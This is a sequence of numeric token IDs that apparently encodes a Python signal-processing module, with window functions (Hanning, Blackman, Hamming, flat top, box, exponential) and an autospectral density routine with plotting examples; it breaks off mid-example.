220, 13163, 2124, 6966, 796, 317, 9, 37659, 13, 6966, 7, 17, 9, 37659, 13, 14415, 9, 19503, 80, 9, 2435, 8, 198, 220, 220, 220, 13163, 2124, 28, 37659, 13, 67, 25558, 19510, 87, 31369, 11, 87, 6966, 4008, 1303, 40525, 1981, 4406, 13, 410, 25558, 198, 220, 220, 220, 13163, 2124, 86, 28, 36540, 13, 7637, 768, 7, 87, 27493, 87, 198, 220, 220, 220, 13163, 2336, 11, 357, 897, 16, 11, 7877, 17, 8, 796, 458, 83, 13, 7266, 489, 1747, 7, 17, 11, 352, 8, 198, 220, 220, 220, 13163, 7877, 16, 13, 29487, 7, 2435, 13, 51, 11, 87, 58, 45299, 45299, 16, 4083, 51, 8, 198, 220, 220, 220, 685, 27, 6759, 29487, 8019, 13, 6615, 13, 13949, 17, 35, 2134, 379, 2644, 37981, 198, 220, 220, 220, 13163, 7877, 16, 13, 2617, 62, 88, 2475, 26933, 12, 1238, 11, 1160, 12962, 198, 220, 220, 220, 13841, 1238, 11, 1160, 8, 198, 220, 220, 220, 13163, 7877, 16, 13, 2617, 62, 7839, 10786, 3118, 7972, 6972, 1366, 11, 362, 4406, 2637, 8, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 16, 4032, 3118, 7972, 6972, 1366, 11, 362, 4406, 2637, 8, 198, 220, 220, 220, 13163, 7877, 16, 13, 2617, 62, 2645, 9608, 10786, 3, 87, 7, 83, 8, 3, 11537, 198, 220, 220, 220, 8255, 7, 15, 11, 15, 13, 20, 4032, 3, 87, 7, 83, 8, 3, 11537, 198, 220, 220, 220, 13163, 7877, 17, 13, 29487, 7, 2435, 58, 15, 11, 25, 4357, 87, 86, 58, 15, 11, 25, 4357, 2435, 58, 15, 11, 25, 4357, 36540, 13, 7637, 768, 7, 87, 38381, 15, 11, 47715, 9, 32, 11, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 438, 3256, 2435, 58, 15, 11, 25, 4357, 12, 36540, 13, 7637, 768, 7, 87, 38381, 15, 11, 47715, 9, 32, 4032, 438, 11537, 198, 220, 220, 220, 685, 27, 6759, 29487, 8019, 13, 6615, 13, 13949, 17, 35, 2134, 379, 2644, 37981, 198, 220, 220, 220, 13163, 7877, 17, 13, 2617, 62, 2645, 9608, 10786, 29919, 768, 4324, 276, 720, 87, 7, 83, 8, 3, 11537, 198, 220, 220, 220, 8255, 7, 15, 11, 15, 13, 20, 4032, 29919, 768, 4324, 276, 720, 87, 7, 83, 8, 3, 11537, 198, 220, 220, 220, 13163, 7877, 17, 13, 2617, 62, 87, 18242, 10786, 2435, 11537, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 15, 4032, 2435, 11537, 198, 220, 220, 220, 13163, 7877, 17, 13, 2617, 62, 7839, 10786, 18610, 286, 4324, 13, 5740, 262, 20796, 284, 45075, 38661, 37188, 11537, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 16, 4032, 18610, 286, 4324, 13, 5740, 262, 20796, 284, 45075, 38661, 37188, 11537, 198, 220, 220, 220, 13163, 2336, 13, 33464, 62, 39786, 3419, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 611, 318, 39098, 7, 87, 11, 357, 4868, 11, 46545, 11, 45941, 13, 358, 18747, 8, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 16447, 9530, 768, 4324, 278, 7177, 286, 15793, 299, 416, 399, 416, 299, 81, 198, 220, 220, 220, 220, 220, 220, 220, 810, 399, 318, 1271, 286, 1366, 2173, 290, 299, 318, 262, 1271, 286, 1271, 286, 198, 220, 220, 220, 220, 220, 220, 220, 17311, 393, 23862, 290, 299, 81, 318, 262, 1271, 286, 4406, 526, 15931, 628, 220, 220, 220, 220, 220, 220, 220, 16075, 796, 657, 198, 220, 220, 220, 220, 220, 220, 220, 611, 18896, 7, 87, 13, 43358, 8, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 775, 423, 2035, 257, 16578, 283, 393, 352, 35, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2124, 13, 43358, 58, 15, 60, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 7203, 87, 318, 257, 16578, 283, 986, 290, 6584, 43054, 83, 423, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5982, 428, 636, 286, 262, 9052, 19570, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 399, 796, 18896, 7, 87, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 289, 272, 768, 7, 45, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 18896, 7, 87, 13, 43358, 8, 6624, 513, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3601, 10786, 64, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3601, 7, 69, 13, 43358, 8, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2124, 13, 43358, 58, 15, 60, 1875, 2124, 13, 43358, 58, 16, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 796, 45941, 13, 2032, 499, 897, 274, 7, 87, 11, 657, 11, 352, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 16075, 796, 352, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 10462, 5912, 34197, 13413, 284, 307, 31332, 351, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9027, 13, 314, 43054, 297, 4259, 606, 287, 534, 1255, 11537, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 289, 272, 768, 7, 87, 13, 43358, 58, 16, 12962, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 11, 45941, 13, 283, 858, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 13, 43358, 58, 15, 46570, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 17, 60, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 16075, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 2032, 499, 897, 274, 7, 69, 11, 657, 11, 352, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 18896, 7, 87, 13, 43358, 8, 6624, 362, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 277, 11, 62, 28, 37659, 13, 76, 5069, 25928, 7, 69, 58, 15, 11, 25, 4357, 37659, 13, 283, 858, 7, 87, 13, 43358, 58, 15, 60, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3601, 10786, 65, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3601, 10786, 13664, 796, 362, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3601, 7, 87, 13, 43358, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2124, 13, 43358, 58, 15, 60, 1875, 2124, 13, 43358, 58, 16, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 796, 45941, 13, 2032, 499, 897, 274, 7, 87, 11, 657, 11, 352, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 16075, 796, 352, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 10462, 5912, 34197, 13413, 284, 307, 31332, 351, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9027, 13, 314, 43054, 297, 4259, 606, 287, 534, 1255, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 289, 272, 768, 7, 87, 13, 43358, 58, 16, 12962, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 11, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 15, 60, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 16075, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 2032, 499, 897, 274, 7, 69, 11, 657, 11, 352, 8, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 3601, 7, 87, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 13610, 289, 272, 768, 4324, 286, 4129, 2124, 198, 220, 220, 220, 220, 220, 220, 220, 399, 796, 2124, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 3601, 7, 45, 8, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 31369, 7, 37659, 13, 14415, 1635, 45941, 13, 283, 858, 7, 45, 8, 1220, 357, 45, 532, 352, 4008, 1174, 17, 1635, 45941, 13, 31166, 17034, 7, 23, 1220, 513, 8, 198, 220, 220, 220, 220, 220, 220, 220, 611, 3487, 1096, 318, 6407, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 277, 1220, 8591, 13, 27237, 7, 69, 8, 1635, 45941, 13, 31166, 17034, 7, 45, 8, 198, 220, 220, 220, 1441, 277, 628, 198, 4299, 2042, 5404, 7, 87, 2599, 198, 220, 220, 220, 37227, 13615, 262, 299, 966, 2619, 805, 4324, 13, 628, 220, 220, 220, 16409, 2124, 355, 262, 2619, 805, 4324, 278, 7177, 2124, 62, 17497, 198, 220, 220, 220, 383, 4324, 276, 6737, 318, 788, 2124, 9, 87, 62, 17497, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 3601, 10786, 13424, 5404, 318, 1418, 7287, 11537, 198, 220, 220, 220, 611, 318, 39098, 7, 87, 11, 357, 4868, 11, 46545, 11, 45941, 13, 358, 18747, 8, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 299, 796, 2124, 13, 43358, 58, 16, 60, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 2042, 5404, 7, 77, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 18896, 7, 87, 13, 43358, 8, 6624, 513, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 58, 15, 11, 1058, 4357, 45941, 13, 283, 858, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 13, 43358, 58, 15, 46570, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 17, 60, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 58, 15, 11, 1058, 4357, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 15, 60, 4008, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 299, 796, 2124, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 3447, 1758, 19510, 15, 13, 3682, 532, 657, 13, 20, 1635, 45941, 13, 6966, 7, 17, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 77, 8, 1343, 764, 20, 4008, 1220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 77, 8, 1343, 764, 2919, 1635, 45941, 13, 6966, 7, 19, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 77, 8, 1343, 764, 20, 4008, 1220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 77, 4008, 1635, 45941, 13, 31166, 17034, 7, 27641, 1220, 1315, 1954, 828, 357, 16, 11, 532, 16, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 277, 1220, 8591, 13, 27237, 7, 69, 8, 1635, 45941, 13, 31166, 17034, 7, 77, 8, 198, 220, 220, 220, 1441, 277, 628, 198, 4299, 1033, 5404, 7, 87, 11, 40379, 28, 13, 2425, 2599, 198, 220, 220, 220, 37227, 13615, 262, 299, 966, 39682, 4324, 13, 628, 220, 220, 220, 16409, 2124, 355, 262, 1033, 5404, 4324, 278, 7177, 2124, 62, 7972, 6972, 198, 220, 220, 220, 383, 4324, 276, 6737, 318, 788, 2124, 9, 87, 62, 17497, 198, 220, 220, 220, 383, 11902, 1218, 4578, 900, 262, 642, 4, 366, 17744, 1359, 640, 1, 286, 262, 4324, 13, 198, 220, 220, 220, 15161, 318, 40379, 28, 15, 13, 2425, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 3601, 10786, 11201, 5404, 318, 1418, 7287, 11537, 198, 220, 220, 220, 37096, 796, 532, 912, 1220, 45941, 13, 6404, 7, 13, 2713, 8, 198, 220, 220, 220, 611, 318, 39098, 7, 87, 11, 357, 4868, 11, 46545, 11, 45941, 13, 358, 18747, 8, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 299, 796, 2124, 13, 43358, 58, 16, 60, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 1033, 5404, 7, 77, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 18896, 7, 87, 13, 43358, 8, 6624, 513, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 58, 15, 11, 1058, 4357, 45941, 13, 283, 858, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 13, 43358, 58, 15, 46570, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 17, 60, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 58, 15, 11, 1058, 4357, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 15, 60, 4008, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 299, 796, 2124, 198, 220, 220, 220, 220, 220, 220, 220, 410, 796, 357, 77, 532, 352, 8, 1220, 299, 1635, 45941, 13, 283, 858, 7, 77, 8, 1343, 357, 77, 532, 352, 8, 1220, 299, 1220, 362, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 11201, 32590, 85, 1220, 37096, 1220, 357, 77, 532, 352, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 277, 1220, 8591, 13, 27237, 7, 69, 8, 1635, 45941, 13, 31166, 17034, 7, 77, 8, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 3447, 1758, 7, 69, 11, 357, 16, 11, 532, 16, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 277, 1220, 8591, 13, 27237, 7, 69, 8, 1635, 45941, 13, 31166, 17034, 7, 77, 8, 628, 220, 220, 220, 1441, 277, 628, 198, 4299, 25755, 5404, 7, 87, 2599, 198, 220, 220, 220, 37227, 13615, 262, 299, 966, 8891, 2229, 4324, 13, 628, 220, 220, 220, 16409, 2124, 355, 262, 8891, 2229, 4324, 278, 18747, 2124, 62, 7972, 6972, 198, 220, 220, 220, 383, 4324, 276, 6737, 318, 788, 2124, 9, 87, 62, 17497, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 3601, 10786, 2763, 76, 5404, 318, 1418, 7287, 11537, 198, 220, 220, 220, 611, 318, 39098, 7, 87, 11, 357, 4868, 11, 46545, 11, 45941, 13, 358, 18747, 8, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 299, 796, 2124, 13, 43358, 58, 16, 60, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 25755, 5404, 7, 77, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 18896, 7, 87, 13, 43358, 8, 6624, 513, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 58, 15, 11, 1058, 4357, 45941, 13, 283, 858, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 13, 43358, 58, 15, 46570, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 17, 60, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 58, 15, 11, 1058, 4357, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 15, 60, 4008, 198, 220, 220, 220, 2073, 25, 628, 220, 220, 220, 220, 220, 220, 220, 299, 796, 2124, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 3447, 1758, 19510, 15, 13, 4051, 532, 657, 13, 3510, 1635, 45941, 13, 6966, 7, 17, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 77, 4008, 1220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 77, 532, 352, 22305, 1635, 45941, 13, 31166, 17034, 7, 27641, 1220, 12923, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 16, 11, 532, 16, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 277, 1220, 8591, 13, 27237, 7, 69, 8, 1635, 45941, 13, 31166, 17034, 7, 77, 8, 628, 220, 220, 220, 1441, 277, 628, 198, 4299, 6228, 5404, 7, 87, 2599, 198, 220, 220, 220, 37227, 13615, 262, 299, 966, 6228, 1353, 4324, 13, 628, 220, 220, 220, 2124, 62, 28457, 28, 38568, 5404, 7, 87, 8, 198, 220, 220, 220, 16409, 2124, 355, 262, 6228, 1353, 4324, 278, 7177, 2124, 62, 7972, 6972, 198, 220, 220, 220, 383, 4324, 276, 6737, 318, 788, 2124, 9, 87, 62, 17497, 198, 220, 220, 220, 18184, 11, 509, 13, 402, 1539, 366, 53, 571, 1358, 23983, 25, 17003, 290, 19939, 553, 43424, 11, 8735, 13, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 3601, 10786, 38568, 5404, 318, 1418, 7287, 11537, 198, 220, 220, 220, 611, 318, 39098, 7, 87, 11, 357, 4868, 11, 46545, 11, 45941, 13, 358, 18747, 8, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 299, 796, 2124, 13, 43358, 58, 16, 60, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 6228, 5404, 7, 77, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 18896, 7, 87, 13, 43358, 8, 6624, 513, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 58, 15, 11, 1058, 4357, 45941, 13, 283, 858, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 13, 43358, 58, 15, 46570, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 17, 60, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 58, 15, 11, 1058, 4357, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 15, 60, 4008, 198, 220, 220, 220, 2073, 25, 628, 220, 220, 220, 220, 220, 220, 220, 299, 796, 2124, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 3447, 1758, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 16, 13, 15, 532, 352, 13, 24, 2091, 1635, 45941, 13, 6966, 7, 17, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 77, 4008, 1220, 357, 77, 532, 352, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1343, 352, 13, 27033, 1635, 45941, 13, 6966, 7, 19, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 77, 4008, 1220, 357, 77, 532, 352, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 532, 657, 13, 28460, 1635, 45941, 13, 6966, 7, 21, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 77, 4008, 1220, 357, 77, 532, 352, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1343, 657, 13, 49959, 1635, 45941, 13, 6966, 7, 23, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 77, 4008, 1220, 357, 77, 532, 352, 4008, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 16, 11, 532, 16, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 277, 1220, 8591, 13, 27237, 7, 69, 8, 1635, 45941, 13, 31166, 17034, 7, 77, 8, 628, 220, 220, 220, 1441, 277, 628, 198, 4299, 3091, 5404, 7, 87, 2599, 198, 220, 220, 220, 37227, 13615, 262, 299, 966, 3091, 4324, 357, 403, 6933, 737, 628, 220, 220, 220, 16409, 2124, 355, 262, 3091, 5404, 4324, 278, 7177, 2124, 62, 7972, 6972, 198, 220, 220, 220, 383, 4324, 276, 6737, 318, 788, 2124, 9, 87, 62, 17497, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 3601, 10786, 3524, 5404, 318, 1418, 7287, 11537, 198, 220, 220, 220, 611, 318, 39098, 7, 87, 11, 357, 4868, 11, 46545, 11, 45941, 13, 358, 18747, 8, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 299, 796, 2124, 13, 43358, 58, 16, 60, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 3091, 5404, 7, 77, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 18896, 7, 87, 13, 43358, 8, 6624, 513, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 58, 15, 11, 1058, 4357, 45941, 13, 283, 858, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 13, 43358, 58, 15, 46570, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 17, 60, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 58, 15, 11, 1058, 4357, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 15, 60, 4008, 198, 220, 220, 220, 2073, 25, 628, 220, 220, 220, 220, 220, 220, 220, 299, 796, 2124, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 277, 28, 37659, 13, 3447, 1758, 19510, 16, 13, 15, 12, 16, 13, 24, 2091, 9, 37659, 13, 6966, 7, 17, 9, 37659, 13, 14415, 9, 7, 37659, 13, 283, 858, 7, 77, 4008, 29006, 77, 12, 16, 4008, 10, 16, 13, 27033, 9, 37659, 13, 6966, 7, 19, 9, 37659, 13, 14415, 9, 7, 37659, 13, 283, 858, 7, 77, 4008, 29006, 77, 12, 16, 4008, 12, 15, 13, 28460, 9, 37659, 13, 6966, 7, 21, 9, 37659, 13, 14415, 9, 7, 37659, 13, 283, 858, 7, 77, 4008, 29006, 77, 12, 16, 4008, 10, 15, 13, 49959, 9, 37659, 13, 6966, 7, 23, 9, 37659, 13, 14415, 9, 7, 37659, 13, 283, 858, 7, 77, 4008, 29006, 77, 12, 16, 4008, 828, 7, 16, 12095, 16, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 3447, 1758, 7, 37659, 13, 1952, 19510, 16, 11, 299, 36911, 357, 16, 11, 532, 16, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 277, 1220, 8591, 13, 27237, 7, 69, 8, 1635, 45941, 13, 31166, 17034, 7, 77, 8, 628, 220, 220, 220, 1441, 277, 628, 198, 4299, 289, 1236, 5404, 46491, 22046, 11, 12429, 46265, 22046, 2599, 198, 220, 220, 220, 37227, 49788, 329, 2163, 4600, 7637, 768, 63, 526, 15931, 198, 220, 220, 220, 1441, 289, 272, 768, 46491, 22046, 11, 12429, 46265, 22046, 8, 628, 198, 4299, 355, 67, 7, 87, 11, 256, 11, 2344, 593, 480, 2625, 23108, 1600, 257, 303, 28, 30388, 7, 17821, 8, 2599, 198, 220, 220, 220, 37227, 13615, 44619, 806, 6582, 357, 6477, 10958, 8, 12109, 286, 257, 6737, 2124, 13, 628, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 2124, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 6060, 7177, 357, 77, 2124, 399, 2124, 285, 8, 810, 299, 318, 262, 1271, 286, 15736, 11, 285, 262, 198, 220, 220, 220, 220, 220, 220, 220, 1271, 286, 10256, 13, 198, 220, 220, 220, 256, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 3862, 7177, 357, 16, 2124, 399, 8, 198, 220, 220, 220, 2344, 593, 480, 1058, 4731, 198, 220, 220, 220, 220, 220, 220, 220, 6530, 286, 4324, 278, 2163, 284, 779, 13, 4091, 4600, 17497, 44646, 198, 220, 220, 220, 257, 303, 1058, 20512, 11, 11902, 7, 17821, 8, 198, 220, 220, 220, 220, 220, 220, 220, 13475, 1255, 393, 407, 30, 628, 220, 220, 220, 16409, 198, 220, 220, 220, 35656, 198, 220, 220, 220, 277, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 31902, 15879, 357, 16, 2124, 399, 8, 198, 220, 220, 220, 350, 5324, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5231, 418, 806, 6582, 357, 77, 2124, 399, 8, 393, 357, 77, 2124, 399, 2124, 285, 8, 611, 407, 16449, 13, 628, 220, 220, 220, 21066, 198, 220, 220, 220, 24200, 198, 220, 220, 220, 13163, 422, 629, 541, 88, 1330, 6737, 198, 220, 220, 220, 13163, 1330, 299, 32152, 355, 45941, 198, 220, 220, 220, 13163, 1330, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 220, 220, 220, 13163, 1330, 30999, 33407, 355, 410, 83, 198, 220, 220, 220, 13163, 1330, 299, 32152, 13, 75, 1292, 70, 355, 8591, 628, 220, 220, 220, 2980, 378, 257, 642, 1218, 1332, 6737, 11, 257, 838, 569, 264, 500, 6769, 379, 2026, 26109, 11, 26940, 416, 198, 220, 220, 220, 657, 13, 8298, 569, 1174, 17, 14, 7399, 286, 2330, 7838, 35846, 379, 352, 37597, 13, 628, 220, 220, 220, 13163, 6291, 62, 19503, 80, 796, 352, 68, 18, 198, 220, 220, 220, 13163, 256, 20311, 796, 642, 198, 220, 220, 220, 13163, 43237, 62, 19503, 80, 28, 1120, 198, 220, 220, 220, 13163, 317, 28, 940, 198, 220, 220, 220, 13163, 7838, 62, 6477, 796, 657, 13, 18005, 1635, 6291, 62, 19503, 80, 1220, 362, 198, 220, 220, 220, 13163, 7838, 62, 6477, 796, 317, 14, 16, 68, 1065, 198, 220, 220, 220, 13163, 640, 796, 45941, 13, 283, 858, 7, 15, 11, 83, 20311, 11, 16, 14, 39873, 62, 19503, 80, 8, 198, 220, 220, 220, 13163, 640, 796, 45941, 13, 3447, 1758, 7, 2435, 11, 357, 16, 11, 532, 16, 4008, 198, 220, 220, 220, 13163, 2124, 796, 317, 9, 37659, 13, 31369, 7, 17, 9, 37659, 13, 14415, 9, 82, 328, 62, 19503, 80, 9, 2435, 8, 198, 220, 220, 220, 13163, 2124, 796, 2124, 1343, 45941, 13, 25120, 13, 11265, 7, 9888, 28, 37659, 13, 31166, 17034, 7, 3919, 786, 62, 6477, 828, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2546, 16193, 